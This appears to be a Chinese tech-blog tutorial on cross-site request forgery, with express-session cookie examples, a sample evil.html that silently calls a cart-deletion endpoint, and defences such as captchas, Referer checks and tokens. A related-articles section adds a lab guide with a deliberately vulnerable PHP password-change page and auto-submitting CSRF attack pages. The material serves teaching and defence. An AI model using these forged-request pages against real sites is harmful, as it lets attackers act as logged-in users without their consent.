跨站请求伪造(CSRF)

最新推荐文章于 2025-06-14 04:17:45 发布
最新推荐文章于 2025-06-14 04:17:45 发布
阅读量1.4k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: web安全 文章标签: web安全 csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Ryron/article/details/72614997

跨站请求伪造 CSRF

Cross-site request forgery,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。

跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。这种信任是由于请求成功发送了浏览器Cookie。

浏览器Cookie分Third-party CookieSession Cookie

Third-party Cookie

Third-party Cookie 是服务器Set-Cookie时指定Expire时间,只有到Expire时间到后Cookie 才会生效,所以这种Cookie会保存在本地;

Session Cookie

Session Cookie 没有指定Expire时间,当浏览器关闭后,Session Cookie 就会失效。

下面以express-session为例。

没有设置Expire 

app.use(session({

  secret: 'keyboard cat'

}));

登录成功后浏览器Cookie

image

关闭浏览器后重新打开页面

image

发现Cookie 值已经改变,之前设置的Cookie 值已失效。

设置Expire

app.use(session({
  secret: 'keyboard cat',
  cookie: {
    expires: 60000 // 1分钟
  }
}));

登录后的 Cookie 值。

image

关闭浏览器重新打开后

image

Cookie 保持不变,保持登录状态。

CSRF 攻击

CSRF 利用网站对用户网页浏览器的信任(Cookie),会恶意删除重要数据。
例如:一个购物系统,正常登陆的用户提供删除购物车接口/deleteShoppingCart

// session状态拦截
app.use(function (req, res, next) {  
  if (req.session.userAccount) {  
     // 已登陆状态
    next();                      
  } else {  
    // 未登录
    let isLogin = req.url.search(/login/i) >=0 ? true : false;
    if(isLogin){
      next();                      // 如果是登陆接口请求,可以进入系统
    }else{
      res.redirect("/loginPage");  // 跳转登陆页面
    }
  }  
});

用户在登陆状态下是可以执行/deleteShoppingCart

image

现在有一恶意攻击页面evil.html,里面的img src指向/deleteShoppingCart接口。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    <img src="http://192.168.31.235:3000/deleteShoppingCart">
</body>
</html>

后台记录当前浏览器的用户已经登陆,即浏览器发起的请求后台都认为是合法的。用户不小心打开恶意攻击页面,页面会请求http://192.168.31.235:3000/deleteShoppingCart, 删除购物车接口会执行。

image

以上攻击是攻击者利用网站对浏览器的信任,在用户不知情的情况下,伪造恶意请求。

CSRF 防御

验证码

验证码被认为是对抗CSRF攻击最简洁有效的防御方法.

CSRF攻击往往是在用户不知情的情况下造成的网络请求,如上述例子,添加验证码验证能很好地遏制CSRF攻击。
验证码的缺点就是网站不能所有操作(请求)都加上验证码,它是防御CSRF攻击的辅助手段。

Referer check

web服务端检测请求头 referer 是否来自合法的“源”,如果是合法请求源,允许请求。
比如从http://192.168.31.235:3000/ 页面发起的请求。

// req.headers.referer

referer: 'http://192.168.31.235:3000/'

缺点就是不是所有浏览器请求头都会发送Referer。

CSRF Token

防止CSRF攻击的另一种方法是在服务端生成Token,放在Html节点(表单、标签属性等)、Javascript全局变量或者http响应时写在Cookie + Ajax请求。

参考资料

跨站请求伪造CSRF
BinParker的博客
08-10 424
CSRF(Cross-site request forgery)跨站请求伪造攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。
跨站请求伪造(CSRF)漏洞详解
CoffeMilk的博客
09-21 1561
跨站请求伪造(Cross-site request forgery 简称:CSRF);是一种冒充受信任用户,向服务器发送非预期请求攻击方式(它允许攻击者诱使用户执行他们不打算执行的操作;允许攻击者部分绕过同源策略,该策略旨在防止不同网站相互干扰)【CSRF主要利用的是网站对用户网页浏览器的信任】【XSS 利用的是用户对指定网站的信任】。 跨站请求伪造攻击特性是危害性大但非常隐蔽,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击
flask中的csrf防御机制
FreeSpider
07-17 2168
csrf概念 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击...
CSRF跨站请求伪造攻击
qq_68163788的博客
02-05 2212
CSRF(Cross-Site Request Forgery)是一种网络安全攻击攻击者利用用户已经登录的身份,在用户不知情的情况下发送恶意请求,以执行某些操作或获取用户的敏感信息。攻击者通常会诱使用户访问包含恶意请求的页面,或者通过其他方式注入恶意代码,以触发CSRF攻击CSRF攻击通常利用用户在其他网站上的身份验证信息,因此攻击者可以利用这些信息来执行恶意操作,比如更改用户密码、转账、发送消息等。由于CSRF攻击利用了用户的信任和已登录的身份,因此很难被用户察觉。
彻底搞懂网络安全中的 CSRF 攻击,(非常详细)从零基础到精通,收藏这篇就够了!
Python_0011的博客
06-05 928
各位网络安全爱好者,今天咱们来聊聊一个老生常谈但又不得不防的安全漏洞——,也就是跨站请求伪造。别看它名字挺唬人,其实理解起来一点都不难。保证你看完这篇文章,就能像躲避老板突击检查一样,轻松应对 CSRF 攻击
安全测试之跨站请求伪造(CSRF)攻击
小太阳~
01-28 7203
一、CSRF攻击的概念CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在并未授权的情况下执行在权限保护之下的操作,对用户的安全及网站的安全具有很大的危害性。一、CSRF攻击的原理如下图所示,CSRF攻击的原理比较容易理解,其中Web A是存在CSRF漏洞的网站,Web B是
跨站请求伪造CSRF,Cross-Site Request Forgery)
坚定目标,超越自我
10-10 3112
由于跨站请求通常无法携带自定义头信息,因此检查请求中是否包含自定义头可以作为一种防御手段。使用自定义请求头是一种防御跨站请求伪造CSRF攻击的技术。这种方法的基本思想是在客户端的请求中添加一个自定义的HTTP头部(Header),服务器端检查这个头部以验证请求的合法性。由于跨站请求通常无法设置自定义头部,这为服务器提供了一种简单的验证机制。
网络安全防护:跨站请求伪造CSRF
最新发布
xike1024的博客
06-14 1282
跨站请求伪造CSRF):攻击者用来通过用户浏览器冒充用户身份向服务器发送伪造请求并被目标服务器成功执行的漏洞
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 2272
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站点上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解。
CSRF跨站请求伪造CSRF PHP demo代码
05-04
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种网络攻击方式,攻击者通过诱导用户在已登录的网站上执行非预期的操作。在这个PHP demo中,我们将深入理解CSRF攻击的原理,并探讨如何防范。 首先,让我们看...
Tomcat怎样防止跨站请求伪造(CSRF) 1
08-08
Tomcat 防止跨站请求伪造CSRF)机制浅析 在 Web 应用开发中,跨站请求伪造CSRF)是一种常见的安全威胁。跨站请求伪造攻击是指攻击者诱骗受信任用户访问恶意网站,从而使得恶意网站能以用户身份对受信任网站执行...
CSRF - 跨站请求伪造
weixin_46601374的博客
03-01 5859
什么是CSRF? CSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 实说白了..
CSRF---跨站请求伪造
monster0319的博客
03-09 1017
攻击原理: 攻击者利用用户在浏览器中保存的认证信息,向对应的站点发送伪造请求。用户的认证是通过保存在cookie中的数据实现,在发送请求是,只要浏览器中保存了对应的cookie,服务器端就会认为用户已经处于登录状态。 攻击示例: 某个银行转账链接:http://localhost:22699/Home/Transfer;传的参数name="TargetUser"、name="Amount" 网站源码: <html> <head> <meta http-eq
CSRF(跨站请求伪造)
jxy158212的博客
01-01 1017
CSRF用网站对用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。
CSRF跨站请求伪造
陌茗228.的博客
04-11 179
CSRF跨站请求伪造,利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 Low: 源代码: <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_
CSRF--跨站请求伪造
klcyl_0106的博客
05-12 449
1. 原理 小黑想要修改大白在购物网站www.xx.com上填写的会员地址。 先看下大白是如何修改自己的会员地址的:登录—修改会员信息,提交请求—修改成功。 所以小黑想要修改大白的信息,他需要拥有:1.登录权限 2.修改个人信息的请求。 但是大白又不会把自己xx网站的账号密码告诉小黑,那小黑怎么办? 于是他自己跑到www.xx.com上注册了一个自己的账号,然后修改了一下自己的个人信息(比如:E-mail地址),他发现修改的请求是: http://www.xxx.com/edit.php?email=xia
跨站请求伪造csrf
weixin_45095113的博客
11-15 1109
csrf
跨站请求伪造CSRF实验
04-03
### 关于跨站请求伪造CSRF)实验的设计与实施 #### 实验目标 通过设计并执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动点击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标站点提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,并掌握相应的缓解手段。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值